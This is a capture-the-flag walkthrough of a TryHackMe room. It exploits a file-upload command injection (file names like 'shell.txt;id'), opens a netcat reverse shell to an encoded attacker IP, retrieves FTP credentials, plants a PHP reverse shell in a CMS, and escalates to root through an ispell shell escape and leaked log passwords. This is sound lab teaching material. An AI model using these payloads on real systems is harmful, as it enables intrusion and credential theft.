Tempus Fugit Durius TryHackme Writeup
By Shamsher khan This is a Writeup of Tryhackme room “Tempus Fugit Durius”
Room link: https://tryhackme.com/room/tempusfugitdurius
Note: This room is for Premium Members Only. who purchased THM premium membership.
Task 1 Harder
Tempus Fugit is a Latin phrase that roughly translated as “time flies”.
Durius is also latin and means “harder”.
This is a remake of Tempus Fugit 1. A bit harder and different from the first one. It is an intermediate/hard, real life box.
Let’s start with our nmap scan first:
As we can see from our output, we have 4 ports open: 22, 80, 111 and lastly 51947. Let’s start to enumerate the HTTP service:
The “Upload” link on the top of the page looks interesting. Let’s navigate on that one:
We can see an upload option on the top right side. I uploaded a shell and got an error about file types.
Now I don’t know about txt but rtf sounds a bit suspicious. I searched for rtf reverse shell and got link to RCE via rtf files but all the available exploits were for windows system.
Burpsuite
Then I decided to intercept the requests while submitting the form and see if I can find something.
I was getting a redirect response in burp but I couldn’t figure out so @4nqr34z gave me a hint. He said play with the file name and see the output in the browser.
So I did that, I changed the name of the file as shell.txt;id and sent the request and in my browser I could see output of the id command.
NOTE: if you get confused with all this burp and browser thing then you can just do it but editing your file name and re-uploading it with different commands. Like make a file with name shell.txt;id and upload it you’ll see the output. Then rename the file to shell.txt;ls to see that output and so on.
Create some files like this
If we run a command like ls -la we’ll get the following output:
Use Ctrl+u to see better view
Revershell
There are several things making revershell hard. You cannot use . # / and you are limited to 30 characters Converting IP to decimal helps with both length and . problems. The payload cannot be more than 30 characters.
thats why change file name file.txt to s.txt to making short
s.txt;nc 167906330 4444 -e sh
Now start listener
now upload your file
Here we got shell
python -c 'import pty;pty.spawn("/bin/bash")'
We got ftp user credential
Its time to login into FTP
But couldn’t login
We don’t have access to a FTP client, but we have python
Well, the FTP service is not installed on here, and we are not able to install it. So, after a little bit of research, I found that I got the Python installed on box and if I write a Python script, I can access the FTP service:
now upload this ftp.py on machine
So, it worked! What we can see here is file on FTP share named “creds.txt . Let’s add another couple of lines to our script in order to get “creds.txt” from the share to our computer:
#!/usr/bin/pythonfrom ftplib import FTPftp = FTP('ftp.mofo.pwn')
ftp.login('someuser', '04*************06')
ftp.retrlines('LIST')with open('creds.txt', 'wb') as fp:
ftp.retrbinary('RETR creds.txt', fp.write)
ftp.quit()
Again upload ftp.py file after edit
Recon
We don’t have much tools on the host, so we put up a msf multi/handler and spawn a meterpreter revershell.
Create Revershell
upload shell.elf on machine
msfconsole
Now run shell.elf
as we run shell.elf we got reverse shell
What we can see here is, there is another host up located in Interface 9 with IP address “192.168.150.10”. At this point, we need to escape from this container and access to the host located on Interface 9. In order to do that, we need to do port forwarding:
With above command, we created our Local TCP relay by forwarding Port 80 on Remote Host to our Port 8888. When we do this and browse “localhost:8888”, we can see the same page we got initially from Port 80 on remote host, which is useless for us to find the admin panel we need. At this point, we need to discover other hosts on “192.168.150.0/24” subnet
Add 127.0.0.1 newcms.mofo.pwn to /etc/hosts file
http://newcms.mofo.pwn:8080/admin/
Use admin:B************G credential to login
We try editing a page, adding PHP-code to get shell
Setting>Theme and select hello plugin and edit
http://pentestmonkey.net/tools/php-reverse-shell
After putting my reverse-shell code on the page and when I execute it, I get my shell:
Finally I escaped the container and got a shell from the real machine. Let’s try to navigate to “/home” directory:
Well, apparently, there are two users named “benclower and me”, but we are not privileged to access those.We can check “/etc/passwd” file also. So, the first thing I did after upgrading my shell again to a meterpreter shell was going to “/tmp” directory and copy “linPEAS” from my computer:
On linPEAS output, I saw there are some database files located in the “/var/www/html/inc/data/” directory. Let’s navigate to there:
Download database.sdb
for this we need meterpreter shell
Run shell.elf
Now we got reverse shell
Analyze this file with sqlite3
What we see here is we got the password hash of the user named “Ben Clower”. After performing a brute-force either with hashcat or john by using rockyou.txt, we get the password. So, what I did was switching to benclower
$2y$***********************************************FC
Now we have password of benclower
Time to Privilege
run linpeas.sh again discovers a unusual SGID file
ispell has a shell-escape !So running it on any file it will find misspellings in…
ispell /bin/ping
We are now in user group adm.
Root
We now can read log files. Investigating auth.log
Someone might have entered password in username.
Seems like we got a possible password for root. Let’s try to switch users!!!!
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
